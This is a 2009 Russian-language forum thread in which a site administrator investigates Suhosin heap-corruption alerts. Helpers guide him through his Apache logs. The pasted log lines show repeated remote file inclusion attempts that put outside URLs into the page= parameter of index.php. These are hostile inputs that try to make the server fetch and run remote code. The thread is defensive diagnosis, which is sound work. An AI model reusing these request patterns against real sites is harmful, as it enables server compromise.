атака или кривой код?

[m0ps]

в последнее время в messages начали появляться сообщения подобного рода

Код: Выделить всё

Apr 28 10:46:50 www suhosin[20816]: ALERT - linked list corrupt on efree() - heap corruption detected (attacker '68.158.8.101', file '/usr/local/www/data/index.php')
Apr 28 14:07:26 www suhosin[21385]: ALERT - linked list corrupt on efree() - heap corruption detected (attacker '78.42.133.59', file '/usr/local/www/data/index.php')

иногда еще в вперемешку с ними сыпятся сообщения об исчерпывание свопа, но длиться это не долго, по графикам кактуса даже не заметно (ну есть всплеск, но не до упора).

сразу хочу предупредить, что хостится сайт с кривым пхп кодом, в логи апача постоянно сыпятся нотисы (по гигу и больше за день, пришлось нотисы отключить) и в результате скрипт отваливается по таймауту (при этом функционал сайта сохранятся и программер тупо забил на эти "бока").
а теперь вопрос:
эти ошибки следствия кривого кода или это действительно атаки?

[Хостинг HostFood.ru]

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

[paradox]

лучше залезть еще в акксел лог и еррор
и посмотреть какие страници открывал тот клиент
если никаких
то атака

[m0ps]

как-то я не сообразил
похоже все-таки атака:

Код: Выделить всё

cat httpd-access.log | grep 78.42.133.59
78.42.133.59 - - [28/Apr/2009:14:03:03 +0300] "GET /index.php?page=http://212.81.134.34:2666/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.42.133.59 - - [28/Apr/2009:14:12:38 +0300] "GET /index.php?page=http://212.81.134.34:2666/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

Код: Выделить всё

[16:15]  /var/log >cat httpd-access.log | grep 121.136.151.77
121.136.151.77 - - [23/Apr/2009:10:54:11 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [23/Apr/2009:10:54:29 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [23/Apr/2009:11:54:22 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [23/Apr/2009:11:54:42 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [23/Apr/2009:12:56:17 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [23/Apr/2009:12:56:43 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [23/Apr/2009:13:58:36 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [23/Apr/2009:13:59:03 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [23/Apr/2009:17:59:53 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [23/Apr/2009:18:00:18 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [24/Apr/2009:10:01:36 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [24/Apr/2009:10:08:45 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [24/Apr/2009:10:09:13 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [26/Apr/2009:10:43:11 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [26/Apr/2009:11:24:02 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
121.136.151.77 - - [26/Apr/2009:11:24:35 +0300] "GET /index.php?page=http://mypregnancy.orgfree.com/index.html? HTTP/1.1" 200 7934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

[kabachok]

Удаляй этот скрипт к ебеням

[paradox]

ну и + еще сравнить если ли с других хостов подобное
и может ли быть допустимым такая строка запроса

это кстати может быть банальный сканер
лангуард кажись умеет сканировать на уязвимости и если находит то можно опять же в нем поюзать найденую им дырочку

[m0ps]

ну и + еще сравнить если ли с других хостов подобное

есть, но этих ip не так много, в обратной записи одного из них было словечко "proxy"
а при входе на сайт, который на orgfree получаю:

This account was terminated for terms infringement or bad file permissions have been set by account owner.

и может ли быть допустимым такая строка запроса

не, такие строки не допустимы


P.S. случается это не так часто, где то 1-2 раза в день

[m0ps]

с утра в логах нашел следующее:

Код: Выделить всё

85.216.109.234 - - [28/Apr/2009:19:53:56 +0300] "GET /index.php?page=http://owned-nets.blogspot.com/2009/04/crim-net.html?Please_Click_on_my_google_ads HTTP/1.1" 200 7934 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"

что-то я ничего не понял, что увидел здесь:
_http://owned-nets.blogspot.com/2009/04/crim-net.html?Please_Click_on_my_google_ads

[paradox]

Код: Выделить всё

index.php?page=

анонимный прокси или гипер линки что ли

[m0ps]

странички сайта выглядят как index.php?page=43, но кто-то все время подставляет левые сайты вместо циферок